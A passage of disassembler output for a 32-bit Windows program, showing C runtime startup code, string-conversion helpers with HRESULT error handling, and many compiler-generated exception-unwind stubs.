loc_43183D: ; CODE XREF: HLXc:0043182F�j
call sub_431930
push offset dword_437014
push offset dword_437010
call sub_43192A ; _initterm
mov eax, ds:dword_43BD4C
mov [ebp-6Ch], eax
lea eax, [ebp-6Ch]
push eax
push ds:dword_43BD48
lea eax, [ebp-64h]
push eax
lea eax, [ebp-70h]
push eax
lea eax, [ebp-60h]
push eax
call dword_433230 ; __getmainargs
push offset dword_43700C
push offset dword_437000
call sub_43192A ; _initterm
add esp, 24h
mov eax, dword_433234
mov esi, [eax]
mov [ebp-74h], esi
cmp byte ptr [esi], 22h
jnz short loc_4318D0
loc_431896: ; CODE XREF: HLXc:004318A2�j
inc esi
mov [ebp-74h], esi
mov al, [esi]
cmp al, bl
jz short loc_4318A4
cmp al, 22h
jnz short loc_431896
loc_4318A4: ; CODE XREF: HLXc:0043189E�j
cmp byte ptr [esi], 22h
jnz short loc_4318AD
loc_4318A9: ; CODE XREF: HLXc:004318B5�j
inc esi
mov [ebp-74h], esi
loc_4318AD: ; CODE XREF: HLXc:004318A7�j
; HLXc:004318D3�j
mov al, [esi]
cmp al, bl
jz short loc_4318B7
cmp al, 20h
jbe short loc_4318A9
loc_4318B7: ; CODE XREF: HLXc:004318B1�j
mov [ebp-30h], ebx
lea eax, [ebp-5Ch]
push eax
call dword_433088 ; GetStartupInfoA
test byte ptr [ebp-30h], 1
jz short loc_4318DB
movzx eax, word ptr [ebp-2Ch]
jmp short loc_4318DE
; ---------------------------------------------------------------------------
loc_4318D0: ; CODE XREF: HLXc:00431894�j
; HLXc:004318D9�j
cmp byte ptr [esi], 20h
jbe short loc_4318AD
inc esi
mov [ebp-74h], esi
jmp short loc_4318D0
; ---------------------------------------------------------------------------
loc_4318DB: ; CODE XREF: HLXc:004318C8�j
push 0Ah
pop eax
loc_4318DE: ; CODE XREF: HLXc:004318CE�j
push eax
push esi
push ebx
push ebx
call dword_43308C ; GetModuleHandleA
push eax
call sub_4296C8
mov [ebp-68h], eax
push eax
call dword_43322C ; exit
mov eax, [ebp-14h]
mov ecx, [eax]
mov ecx, [ecx]
mov [ebp-78h], ecx
push eax
push ecx
call sub_431924 ; _XcptFilter
pop ecx
pop ecx
retn
; ---------------------------------------------------------------------------
mov esp, [ebp-18h]
push dword ptr [ebp-78h]
call dword_433224 ; _exit
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_431918 proc near ; CODE XREF: sub_4316CF+3�p
jmp dword_433218
sub_431918 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_43191E proc near ; CODE XREF: sub_431776+23�p
jmp dword_43321C
sub_43191E endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_431924 proc near ; CODE XREF: HLXc:00431904�p
jmp dword_433228
sub_431924 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_43192A proc near ; CODE XREF: HLXc:0043184C�p
; HLXc:0043187F�p
jmp dword_433238
sub_43192A endp
; =============== S U B R O U T I N E =======================================
sub_431930 proc near ; CODE XREF: HLXc:loc_43183D�p
push 30000h
push 10000h
call sub_43194C ; _controlfp
pop ecx
pop ecx
retn
sub_431930 endp
; =============== S U B R O U T I N E =======================================
sub_431942 proc near ; DATA XREF: HLXc:00431831�o
xor eax, eax
retn
sub_431942 endp
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_1. PRESS KEYPAD "+" TO EXPAND]
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_431946 proc near ; DATA XREF: HLXc:004317C4�o
jmp dword_433250
sub_431946 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_43194C proc near ; CODE XREF: sub_431930+A�p
jmp dword_433258
sub_43194C endp
; =============== S U B R O U T I N E =======================================
sub_431952 proc near ; CODE XREF: sub_42342D+4B�p
; sub_42342D+A4�p ...
arg_0 = dword ptr 4
push 0
push [esp+4+arg_0]
call sub_431B44
retn 4
sub_431952 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_431960 proc near ; CODE XREF: sub_4242B2+20�p
; sub_42438B+20�p ...
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push ecx
mov eax, [ebp+arg_4]
and [ebp+var_4], 0
test eax, eax
jz short loc_4319B2
mov ecx, [eax]
lea edx, [ebp+arg_4]
push edx
push offset dword_437C38
push eax
call dword ptr [ecx]
test eax, eax
jl short loc_4319B2
mov eax, [ebp+arg_4]
push esi
push [ebp+arg_8]
mov ecx, [eax]
push eax
call dword ptr [ecx+0Ch]
mov esi, eax
mov eax, [ebp+arg_4]
push eax
mov ecx, [eax]
call dword ptr [ecx+8]
test esi, esi
pop esi
jnz short loc_4319B2
lea eax, [ebp+var_4]
push eax
push 0
call dword_43327C
test eax, eax
jz short loc_4319B2
and [ebp+var_4], 0
loc_4319B2: ; CODE XREF: sub_431960+D�j
; sub_431960+1F�j ...
push [ebp+var_4]
push [ebp+arg_0]
call sub_431B44
leave
retn 0Ch
sub_431960 endp
; =============== S U B R O U T I N E =======================================
sub_4319C1 proc near ; DATA XREF: HLXc:00437008�o
; FUNCTION CHUNK AT 004319DD SIZE 0000000C BYTES
call sub_4319CB
jmp loc_4319DD
sub_4319C1 endp
; =============== S U B R O U T I N E =======================================
sub_4319CB proc near ; CODE XREF: sub_4319C1�p
push 0Ah
push 80020004h
mov ecx, offset dword_43BD58
call sub_431AE8
retn
sub_4319CB endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4319C1
loc_4319DD: ; CODE XREF: sub_4319C1+5�j
push offset sub_4319E9
call sub_4317A2
pop ecx
retn
; END OF FUNCTION CHUNK FOR sub_4319C1
; =============== S U B R O U T I N E =======================================
sub_4319E9 proc near ; DATA XREF: sub_4319C1:loc_4319DD�o
push offset dword_43BD58
call dword_433264
test eax, eax
jge short locret_4319FE
push eax
call sub_431952
locret_4319FE: ; CODE XREF: sub_4319E9+D�j
retn
sub_4319E9 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4319FF proc near ; CODE XREF: sub_424188+12�p
arg_0 = dword ptr 8
push ebp
mov ebp, esp
cmp [ebp+arg_0], 0
push esi
push edi
jnz short loc_431A0E
xor eax, eax
jmp short loc_431A6B
; ---------------------------------------------------------------------------
loc_431A0E: ; CODE XREF: sub_4319FF+9�j
push [ebp+arg_0]
call dword_4330B4 ; lstrlenA
mov esi, eax
inc esi
lea eax, [esi+esi]
add eax, 3
and al, 0FCh
call sub_431700
mov edi, esp
push esi
push edi
push 0FFFFFFFFh
push [ebp+arg_0]
and word ptr [edi], 0
push 0
push 0
call dword_43306C ; MultiByteToWideChar
test eax, eax
jnz short loc_431A64
mov esi, dword_433028
call esi ; RtlGetLastWin32Error
test eax, eax
jz short loc_431A5C
call esi ; RtlGetLastWin32Error
and eax, 0FFFFh
or eax, 80070000h
jmp short loc_431A5E
; ---------------------------------------------------------------------------
loc_431A5C: ; CODE XREF: sub_4319FF+4D�j
xor eax, eax
loc_431A5E: ; CODE XREF: sub_4319FF+5B�j
push eax
call sub_431952
loc_431A64: ; CODE XREF: sub_4319FF+41�j
push edi
call dword_433280
loc_431A6B: ; CODE XREF: sub_4319FF+D�j
lea esp, [ebp-8]
pop edi
pop esi
pop ebp
retn 4
sub_4319FF endp
; =============== S U B R O U T I N E =======================================
sub_431A74 proc near ; CODE XREF: sub_4241E8+B�p
arg_0 = dword ptr 4
push ebx
push ebp
mov ebp, [esp+8+arg_0]
xor ebx, ebx
cmp ebp, ebx
jnz short loc_431A84
xor eax, eax
jmp short loc_431AE3
; ---------------------------------------------------------------------------
loc_431A84: ; CODE XREF: sub_431A74+A�j
push esi
push edi
push ebp
call sub_431C0A ; wcslen
lea edi, [eax+eax+2]
push edi
call sub_431624
mov esi, eax
pop ecx
cmp esi, ebx
pop ecx
jnz short loc_431AA8
push 8007000Eh
call sub_431952
loc_431AA8: ; CODE XREF: sub_431A74+28�j
push ebx
push ebx
push edi
push esi
push 0FFFFFFFFh
push ebp
push ebx
push ebx
mov [esi], bl
call dword_433068 ; WideCharToMultiByte
test eax, eax
jnz short loc_431ADF
mov edi, dword_433028
call edi ; RtlGetLastWin32Error
test eax, eax
jz short loc_431AD7
call edi ; RtlGetLastWin32Error
and eax, 0FFFFh
or eax, 80070000h
jmp short loc_431AD9
; ---------------------------------------------------------------------------
loc_431AD7: ; CODE XREF: sub_431A74+53�j
xor eax, eax
loc_431AD9: ; CODE XREF: sub_431A74+61�j
push eax
call sub_431952
loc_431ADF: ; CODE XREF: sub_431A74+47�j
mov eax, esi
pop edi
pop esi
loc_431AE3: ; CODE XREF: sub_431A74+E�j
pop ebp
pop ebx
retn 4
sub_431A74 endp
; =============== S U B R O U T I N E =======================================
sub_431AE8 proc near ; CODE XREF: sub_4319CB+C�p
arg_0 = dword ptr 4
arg_4 = word ptr 8
push esi
push edi
mov di, [esp+8+arg_4]
mov esi, ecx
cmp di, 3
jz short loc_431B0D
cmp di, 0Ah
jz short loc_431B13
cmp di, 0Bh
jz short loc_431B0D
push 80070057h
call sub_431952
loc_431B0D: ; CODE XREF: sub_431AE8+D�j
; sub_431AE8+19�j
cmp di, 0Ah
jnz short loc_431B1A
loc_431B13: ; CODE XREF: sub_431AE8+13�j
mov word ptr [esi], 0Ah
jmp short loc_431B36
; ---------------------------------------------------------------------------
loc_431B1A: ; CODE XREF: sub_431AE8+29�j
cmp di, 0Bh
jnz short loc_431B31
mov eax, [esp+8+arg_0]
mov [esi], di
neg eax
sbb eax, eax
mov [esi+8], ax
jmp short loc_431B3D
; ---------------------------------------------------------------------------
loc_431B31: ; CODE XREF: sub_431AE8+36�j
mov word ptr [esi], 3
loc_431B36: ; CODE XREF: sub_431AE8+30�j
mov eax, [esp+8+arg_0]
mov [esi+8], eax
loc_431B3D: ; CODE XREF: sub_431AE8+47�j
mov eax, esi
pop edi
pop esi
retn 8
sub_431AE8 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_431B44 proc near ; CODE XREF: sub_431952+6�p
; sub_431960+58�p
var_10 = byte ptr -10h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 10h
push 0
lea ecx, [ebp+var_10]
push [ebp+arg_4]
push [ebp+arg_0]
call sub_431B68
lea eax, [ebp+var_10]
push offset dword_435E38
push eax
call sub_4316EC ; _CxxThrowException
sub_431B44 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_431B68 proc near ; CODE XREF: sub_431B44+11�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = byte ptr 0Ch
mov eax, [esp+arg_0]
push esi
mov esi, ecx
and dword ptr [esi+0Ch], 0
mov [esi+4], eax
mov eax, [esp+4+arg_4]
mov dword ptr [esi], offset off_434AF8
test eax, eax
mov [esi+8], eax
jz short loc_431B94
cmp [esp+4+arg_8], 0
jz short loc_431B94
mov ecx, [eax]
push eax
call dword ptr [ecx+4]
loc_431B94: ; CODE XREF: sub_431B68+1D�j
; sub_431B68+24�j
mov eax, esi
pop esi
retn 0Ch
sub_431B68 endp
; =============== S U B R O U T I N E =======================================
sub_431B9A proc near ; DATA XREF: HLXc:off_434AF8�o
arg_0 = byte ptr 4
push esi
mov esi, ecx
call sub_431BE3
test [esp+4+arg_0], 1
jz short loc_431BB0
push esi
call sub_43161E
pop ecx
loc_431BB0: ; CODE XREF: sub_431B9A+D�j
mov eax, esi
pop esi
retn 4
sub_431B9A endp
; ---------------------------------------------------------------------------
mov eax, [esp+4]
push esi
mov esi, ecx
mov ecx, [eax+4]
mov [esi+4], ecx
mov eax, [eax+8]
and dword ptr [esi+0Ch], 0
mov [esi+8], eax
test eax, eax
mov dword ptr [esi], offset off_434AF8
jz short loc_431BDD
mov ecx, [eax]
push eax
call dword ptr [ecx+4]
loc_431BDD: ; CODE XREF: HLXc:00431BD5�j
mov eax, esi
pop esi
retn 4
; =============== S U B R O U T I N E =======================================
sub_431BE3 proc near ; CODE XREF: sub_431B9A+3�p
; DATA XREF: HLXc:00435E3C�o
push esi
mov esi, ecx
mov eax, [esi+8]
mov dword ptr [esi], offset off_434AF8
test eax, eax
jz short loc_431BF9
mov ecx, [eax]
push eax
call dword ptr [ecx+8]
loc_431BF9: ; CODE XREF: sub_431BE3+E�j
mov esi, [esi+0Ch]
test esi, esi
jz short loc_431C07
push esi
call dword_433064 ; LocalFree
loc_431C07: ; CODE XREF: sub_431BE3+1B�j
pop esi
retn
sub_431BE3 endp
; ---------------------------------------------------------------------------
align 2
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_431C0A proc near ; CODE XREF: sub_431A74+13�p
jmp dword_4331E8
sub_431C0A endp
; =============== S U B R O U T I N E =======================================
SEH_421109 proc near ; DATA XREF: sub_421109+5�o
mov eax, offset dword_434B90
jmp sub_43169C
SEH_421109 endp
; =============== S U B R O U T I N E =======================================
sub_431C1A proc near ; DATA XREF: HLXc:004211C7�o
mov eax, offset dword_434BE8
jmp sub_43169C
sub_431C1A endp
; ---------------------------------------------------------------------------
lea ecx, [ebp-70h]
call dword_433158
retn
; ---------------------------------------------------------------------------
loc_431C2E: ; DATA XREF: HLXc:00421280�o
mov eax, offset dword_434C40
jmp sub_43169C
; =============== S U B R O U T I N E =======================================
SEH_42146A proc near ; DATA XREF: sub_42146A+5�o
mov eax, offset dword_434CA0
jmp sub_43169C
SEH_42146A endp
; =============== S U B R O U T I N E =======================================
sub_431C42 proc near ; DATA XREF: HLXc:004215EC�o
mov eax, offset dword_434CF8
jmp sub_43169C
sub_431C42 endp
; =============== S U B R O U T I N E =======================================
sub_431C4C proc near ; DATA XREF: HLXc:00421832�o
mov eax, offset dword_434D50
jmp sub_43169C
sub_431C4C endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
SEH_421C92 proc near ; DATA XREF: sub_421C92+5�o
mov eax, offset dword_434DE0
jmp sub_43169C
SEH_421C92 endp
; =============== S U B R O U T I N E =======================================
sub_431C6A proc near ; DATA XREF: HLXc:00434E64�o
lea ecx, [ebp+0Ch]
call sub_431642
retn
sub_431C6A endp
; ---------------------------------------------------------------------------
lea ecx, [ebp-1Ch]
call sub_431642
retn
; ---------------------------------------------------------------------------
lea ecx, [ebp-2Ch]
call sub_431642
retn
; ---------------------------------------------------------------------------
mov eax, [ebp-30h]
and eax, 1
test eax, eax
jz locret_431C9B
mov ecx, [ebp+8]
call sub_431642
locret_431C9B: ; CODE XREF: HLXc:00431C8D�j
retn
; ---------------------------------------------------------------------------
loc_431C9C: ; DATA XREF: HLXc:00422510�o
mov eax, offset dword_434E38
jmp sub_43169C
; ---------------------------------------------------------------------------
align 4
mov ecx, [ebp-1Ch]
jmp sub_431642
; ---------------------------------------------------------------------------
loc_431CB0: ; DATA XREF: HLXc:00434EA4�o
mov ecx, [ebp-1Ch]
add ecx, 4
jmp sub_431642
; ---------------------------------------------------------------------------
mov ecx, [ebp-1Ch]
add ecx, 8
jmp sub_431642
; ---------------------------------------------------------------------------
mov ecx, [ebp-1Ch]
add ecx, 10h
jmp sub_431642
; ---------------------------------------------------------------------------
mov ecx, [ebp-1Ch]
add ecx, 14h
jmp sub_431642
; ---------------------------------------------------------------------------
mov ecx, [ebp-1Ch]
add ecx, 1Ch
jmp sub_431642
; ---------------------------------------------------------------------------
mov ecx, [ebp-1Ch]
add ecx, 20h
jmp sub_431642
; ---------------------------------------------------------------------------
mov ecx, [ebp-1Ch]
add ecx, 24h
jmp sub_431642
; ---------------------------------------------------------------------------
mov ecx, [ebp-1Ch]
add ecx, 202Ch
jmp sub_4226C7
; ---------------------------------------------------------------------------
lea ecx, [ebp-14h]
jmp sub_431642
; ---------------------------------------------------------------------------
lea ecx, [ebp-10h]
jmp sub_431642
; ---------------------------------------------------------------------------
loc_431D1B: ; DATA XREF: sub_422A1E�o
mov eax, offset dword_434E78
jmp sub_43169C
; ---------------------------------------------------------------------------
align 4
mov ecx, [ebp-10h]
jmp sub_431642
; ---------------------------------------------------------------------------
loc_431D30: ; DATA XREF: HLXc:00434F1C�o
mov ecx, [ebp-10h]
add ecx, 4
jmp sub_431642
; ---------------------------------------------------------------------------
mov ecx, [ebp-10h]
add ecx, 8
jmp sub_431642
; ---------------------------------------------------------------------------
mov ecx, [ebp-10h]
add ecx, 10h
jmp sub_431642
; ---------------------------------------------------------------------------
mov ecx, [ebp-10h]
add ecx, 14h
jmp sub_431642
; ---------------------------------------------------------------------------
mov ecx, [ebp-10h]
add ecx, 1Ch
jmp sub_431642
; ---------------------------------------------------------------------------
mov ecx, [ebp-10h]
add ecx, 20h
jmp sub_431642
; ---------------------------------------------------------------------------
mov ecx, [ebp-10h]
add ecx, 24h
jmp sub_431642
; ---------------------------------------------------------------------------
loc_431D7D: ; DATA XREF: sub_422BB1�o
mov eax, offset dword_434EF0
jmp sub_43169C
; ---------------------------------------------------------------------------
align 4
loc_431D88: ; DATA XREF: sub_422E6E�o
mov eax, offset dword_434F50
jmp sub_43169C
; ---------------------------------------------------------------------------
align 4
loc_431D94: ; DATA XREF: HLXc:00434FD4�o
lea ecx, [ebp+0Ch]
jmp sub_431642
; ---------------------------------------------------------------------------
lea ecx, [ebp-10h]
jmp sub_431642
; ---------------------------------------------------------------------------
mov eax, [ebp-1Ch]
and eax, 1
test eax, eax
jz locret_431DBA
mov ecx, [ebp+8]
jmp sub_431642
; ---------------------------------------------------------------------------
locret_431DBA: ; CODE XREF: HLXc:00431DAC�j
retn
; ---------------------------------------------------------------------------
loc_431DBB: ; DATA XREF: sub_422F54�o
mov eax, offset dword_434FA8
jmp sub_43169C
; ---------------------------------------------------------------------------
align 4
loc_431DC8: ; DATA XREF: HLXc:0043500C�o
lea ecx, [ebp-10h]
jmp sub_431642
; ---------------------------------------------------------------------------
lea ecx, [ebp-18h]
jmp sub_431642
; ---------------------------------------------------------------------------
lea ecx, [ebp+0Ch]
jmp sub_431642
; ---------------------------------------------------------------------------
mov eax, [ebp-1Ch]
and eax, 1
test eax, eax
jz locret_431DF6
mov ecx, [ebp+8]
jmp sub_431642
; ---------------------------------------------------------------------------
locret_431DF6: ; CODE XREF: HLXc:00431DE8�j
retn
; ---------------------------------------------------------------------------
loc_431DF7: ; DATA XREF: sub_42309C�o
mov eax, offset dword_434FE0
jmp sub_43169C
; ---------------------------------------------------------------------------
align 4
lea ecx, [ebp+8]
jmp sub_4264A2
; ---------------------------------------------------------------------------
loc_431E0C: ; DATA XREF: HLXc:0043504C�o
lea ecx, [ebp-14h]
jmp sub_4264A2
; ---------------------------------------------------------------------------
lea ecx, [ebp-0C0h]
jmp sub_42414A
; ---------------------------------------------------------------------------
lea ecx, [ebp-0D0h]
jmp sub_42414A
; ---------------------------------------------------------------------------
mov ecx, [ebp-0C8h]
jmp sub_431642
; ---------------------------------------------------------------------------
lea ecx, [ebp-100h]
jmp sub_426ABF
; ---------------------------------------------------------------------------
lea ecx, [ebp-3Ch]
jmp sub_42414A
; ---------------------------------------------------------------------------
lea ecx, [ebp-0C4h]
jmp sub_42414A
; ---------------------------------------------------------------------------
mov ecx, [ebp-20h]
jmp sub_431642
; ---------------------------------------------------------------------------
lea ecx, [ebp-140h]
jmp sub_426ABF
; ---------------------------------------------------------------------------
lea ecx, [ebp-9Ch]
jmp sub_42414A
; ---------------------------------------------------------------------------
lea ecx, [ebp-4Ch]
jmp sub_42414A
; ---------------------------------------------------------------------------
lea ecx, [ebp-120h]
jmp sub_4266D6
; ---------------------------------------------------------------------------
lea ecx, [ebp-54h]
jmp sub_42414A
; ---------------------------------------------------------------------------
lea ecx, [ebp-18h]
jmp sub_4264A2
; ---------------------------------------------------------------------------
lea ecx, [ebp-10h]
jmp sub_4264A2
; ---------------------------------------------------------------------------
lea ecx, [ebp-0A4h]
jmp sub_42414A
; ---------------------------------------------------------------------------
lea ecx, [ebp-0CCh]
jmp sub_42414A
; ---------------------------------------------------------------------------
lea ecx, [ebp-0ACh]
jmp sub_42414A
; ---------------------------------------------------------------------------
lea ecx, [ebp-0D8h]
jmp sub_42414A
; ---------------------------------------------------------------------------
lea ecx, [ebp-0B4h]
jmp sub_42414A
; ---------------------------------------------------------------------------
lea ecx, [ebp-0D4h]
jmp sub_42414A
; ---------------------------------------------------------------------------
lea ecx, [ebp-0BCh]
jmp sub_42414A
; ---------------------------------------------------------------------------
lea ecx, [ebp-0E0h]
jmp sub_42414A
; ---------------------------------------------------------------------------
lea ecx, [ebp-38h]
jmp sub_42414A
; ---------------------------------------------------------------------------
lea ecx, [ebp-48h]
jmp sub_42414A
; ---------------------------------------------------------------------------
lea ecx, [ebp-58h]
jmp sub_42414A
; ---------------------------------------------------------------------------
lea ecx, [ebp-68h]
jmp sub_42414A
; ---------------------------------------------------------------------------
lea ecx, [ebp-78h]
jmp sub_42414A
; ---------------------------------------------------------------------------
lea ecx, [ebp-88h]
jmp sub_42414A
; ---------------------------------------------------------------------------
lea ecx, [ebp-98h]
jmp sub_42414A
; ---------------------------------------------------------------------------
lea ecx, [ebp-0A8h]
jmp sub_42414A
; ---------------------------------------------------------------------------
loc_431F3D: ; DATA XREF: sub_42342D�o
mov eax, offset dword_435020
jmp sub_43169C
; ---------------------------------------------------------------------------
align 4
push dword ptr [ebp-10h]
call sub_43161E
pop ecx
retn
; ---------------------------------------------------------------------------
loc_431F52: ; DATA XREF: sub_4240F6�o
mov eax, offset dword_435140
jmp sub_43169C
; ---------------------------------------------------------------------------
push dword ptr [ebp-10h]
call sub_43161E
pop ecx
retn
; ---------------------------------------------------------------------------
loc_431F66: ; DATA XREF: sub_4242EC�o
mov eax, offset dword_435168
jmp sub_43169C
; ---------------------------------------------------------------------------
lea ecx, [ebp+8]
jmp sub_4264A2
; ---------------------------------------------------------------------------
loc_431F78: ; DATA XREF: HLXc:004351BC�o
lea ecx, [ebp-10h]
jmp sub_4264A2
; ---------------------------------------------------------------------------
lea ecx, [ebp-20h]
jmp sub_42414A
; ---------------------------------------------------------------------------
lea ecx, [ebp-14h]
jmp sub_4264A2
; ---------------------------------------------------------------------------
loc_431F90: ; DATA XREF: sub_424429�o
mov eax, offset dword_435190
jmp sub_43169C
; ---------------------------------------------------------------------------
align 4
lea ecx, [ebp-14h]
jmp sub_431642
; ---------------------------------------------------------------------------
loc_431FA4: ; DATA XREF: HLXc:004351FC�o
lea ecx, [ebp-38h]
jmp sub_431642
; ---------------------------------------------------------------------------
lea ecx, [ebp-10h]
jmp sub_431642
; ---------------------------------------------------------------------------
lea ecx, [ebp-24h]
jmp sub_431642
; ---------------------------------------------------------------------------
lea ecx, [ebp-2Ch]
jmp sub_431642
; ---------------------------------------------------------------------------
mov ecx, [ebp+0Ch]
jmp sub_431642
; ---------------------------------------------------------------------------
lea ecx, [ebp-58h]
jmp sub_426ABF
; ---------------------------------------------------------------------------
lea ecx, [ebp-18h]
jmp sub_431642
; ---------------------------------------------------------------------------
lea ecx, [ebp-30h]
jmp sub_431642
; ---------------------------------------------------------------------------
lea ecx, [ebp-34h]
jmp sub_431642
; ---------------------------------------------------------------------------
mov ecx, [ebp+0Ch]
jmp sub_431642
; ---------------------------------------------------------------------------
lea ecx, [ebp-98h]
jmp sub_426ABF
; ---------------------------------------------------------------------------
mov ecx, [ebp+0Ch]
jmp sub_431642
; ---------------------------------------------------------------------------
lea ecx, [ebp-78h]
jmp sub_426ABF
; ---------------------------------------------------------------------------
loc_43200F: ; DATA XREF: sub_4245AA�o
mov eax, offset dword_4351D0
jmp sub_43169C
; ---------------------------------------------------------------------------
align 4
lea ecx, [ebp+8]
jmp sub_431642
; ---------------------------------------------------------------------------
loc_432024: ; DATA XREF: HLXc:0043528C�o
push dword ptr [ebp-14h]
call sub_43161E
pop ecx
retn
; ---------------------------------------------------------------------------
loc_43202E: ; DATA XREF: sub_424A53�o
mov eax, offset dword_435260
jmp sub_43169C
; ---------------------------------------------------------------------------
lea ecx, [ebp-34h]
jmp sub_431642
; ---------------------------------------------------------------------------
loc_432040: ; DATA XREF: HLXc:004352BC�o
lea ecx, [ebp-30h]
jmp sub_431642
; ---------------------------------------------------------------------------
lea ecx, [ebp-44h]
jmp sub_431642
; ---------------------------------------------------------------------------
lea ecx, [ebp-0C8h]
jmp sub_4266D6
; ---------------------------------------------------------------------------
lea ecx, [ebp-28h]
jmp sub_431642
; ---------------------------------------------------------------------------
mov ecx, [ebp-28h]
jmp sub_431642
; ---------------------------------------------------------------------------
lea ecx, [ebp-0A8h]
jmp sub_426ABF
; ---------------------------------------------------------------------------
lea ecx, [ebp-10h]
jmp sub_431642
; ---------------------------------------------------------------------------
mov ecx, [ebp-28h]
jmp sub_431642
; ---------------------------------------------------------------------------
lea ecx, [ebp-88h]
jmp sub_426ABF
; ---------------------------------------------------------------------------
lea ecx, [ebp-10h]
jmp sub_431642
; ---------------------------------------------------------------------------
loc_432099: ; DATA XREF: sub_424AE5�o
mov eax, offset dword_435290
jmp sub_43169C
; ---------------------------------------------------------------------------
align 4
lea ecx, [ebp+0Ch]
jmp sub_431642
; ---------------------------------------------------------------------------
loc_4320AC: ; DATA XREF: HLXc:00435334�o
lea ecx, [ebp+8]
jmp sub_431642
; ---------------------------------------------------------------------------
lea ecx, [ebp-10h]
jmp sub_431642
; ---------------------------------------------------------------------------
mov ecx, [ebp-20h]
jmp sub_431642
; ---------------------------------------------------------------------------
lea ecx, [ebp-44h]
jmp sub_426ABF
; ---------------------------------------------------------------------------
lea ecx, [ebp-18h]
jmp sub_431642
; ---------------------------------------------------------------------------
lea ecx, [ebp-14h]
jmp sub_431642
; ---------------------------------------------------------------------------
lea ecx, [ebp-1Ch]
jmp sub_431642
; ---------------------------------------------------------------------------
lea ecx, [ebp-20h]
jmp sub_431642
; ---------------------------------------------------------------------------
lea ecx, [ebp-1Ch]
jmp sub_431642
; ---------------------------------------------------------------------------
loc_4320F4: ; DATA XREF: sub_4252F7�o
mov eax, offset dword_435308
jmp sub_43169C
; ---------------------------------------------------------------------------
align 10h
loc_432100: ; DATA XREF: HLXc:004353A4�o
lea ecx, [ebp-10h]
jmp sub_431642
; ---------------------------------------------------------------------------
mov ecx, [ebp-18h]
jmp sub_431642
; ---------------------------------------------------------------------------
lea ecx, [ebp-40h]
jmp sub_426ABF
; ---------------------------------------------------------------------------
lea ecx, [ebp-14h]
jmp sub_431642
; ---------------------------------------------------------------------------
lea ecx, [ebp-18h]
jmp sub_431642
; ---------------------------------------------------------------------------
mov eax, [ebp-1Ch]
and eax, 1
test eax, eax
jz locret_43213E
mov ecx, [ebp+8]
jmp sub_431642
; ---------------------------------------------------------------------------
locret_43213E: ; CODE XREF: HLXc:00432130�j
retn
; ---------------------------------------------------------------------------
loc_43213F: ; DATA XREF: sub_4254CE�o
mov eax, offset dword_435378
jmp sub_43169C
; ---------------------------------------------------------------------------
align 4
lea ecx, [ebp-10h]
jmp sub_431642
; ---------------------------------------------------------------------------
loc_432154: ; DATA XREF: HLXc:004353F4�o
lea ecx, [ebp-34h]
jmp sub_4266D6
; ---------------------------------------------------------------------------
loc_43215C: ; DATA XREF: sub_4255E6�o
mov eax, offset dword_4353C8
jmp sub_43169C
; ---------------------------------------------------------------------------
align 4
loc_432168: ; DATA XREF: HLXc:00435424�o
lea ecx, [ebp-10h]
jmp sub_431642
; ---------------------------------------------------------------------------
mov ecx, [ebp-18h]
jmp sub_431642
; ---------------------------------------------------------------------------
lea ecx, [ebp-40h]
jmp sub_426ABF
; ---------------------------------------------------------------------------
lea ecx, [ebp-14h]
jmp sub_431642
; ---------------------------------------------------------------------------
lea ecx, [ebp-18h]
jmp sub_431642
; ---------------------------------------------------------------------------
mov eax, [ebp-1Ch]
and eax, 1
test eax, eax
jz locret_4321A6
mov ecx, [ebp+8]
jmp sub_431642
; ---------------------------------------------------------------------------
locret_4321A6: ; CODE XREF: HLXc:00432198�j
retn
; ---------------------------------------------------------------------------
loc_4321A7: ; DATA XREF: sub_425733�o
mov eax, offset dword_4353F8
jmp sub_43169C
; ---------------------------------------------------------------------------
align 4
loc_4321B4: ; DATA XREF: HLXc:00435474�o
lea ecx, [ebp-10h]
jmp sub_431642
; ---------------------------------------------------------------------------
mov ecx, [ebp-18h]
jmp sub_431642
; ---------------------------------------------------------------------------
lea ecx, [ebp-40h]
jmp sub_426ABF
; ---------------------------------------------------------------------------
lea ecx, [ebp-14h]
jmp sub_431642
; ---------------------------------------------------------------------------
lea ecx, [ebp-18h]
jmp sub_431642
; ---------------------------------------------------------------------------
mov eax, [ebp-1Ch]
and eax, 1
test eax, eax
jz locret_4321F2
mov ecx, [ebp+8]
jmp sub_431642
; ---------------------------------------------------------------------------
locret_4321F2: ; CODE XREF: HLXc:004321E4�j
retn
; ---------------------------------------------------------------------------
loc_4321F3: ; DATA XREF: sub_42583A�o
mov eax, offset dword_435448
jmp sub_43169C
; ---------------------------------------------------------------------------
align 10h
lea ecx, [ebp+8]
jmp sub_431642
; ---------------------------------------------------------------------------
loc_432208: ; DATA XREF: HLXc:004354C4�o
lea ecx, [ebp-10h]
jmp sub_431642
; ---------------------------------------------------------------------------
mov ecx, [ebp-1Ch]
jmp sub_431642
; ---------------------------------------------------------------------------
lea ecx, [ebp-40h]
jmp sub_426ABF
; ---------------------------------------------------------------------------
lea ecx, [ebp-14h]
jmp sub_431642
; ---------------------------------------------------------------------------
lea ecx, [ebp-18h]
jmp sub_431642
; ---------------------------------------------------------------------------
lea ecx, [ebp-1Ch]
jmp sub_431642
; ---------------------------------------------------------------------------
lea ecx, [ebp-18h]
jmp sub_431642
; ---------------------------------------------------------------------------
loc_432240: ; DATA XREF: sub_425952�o
mov eax, offset dword_435498
jmp sub_43169C
; ---------------------------------------------------------------------------
align 4
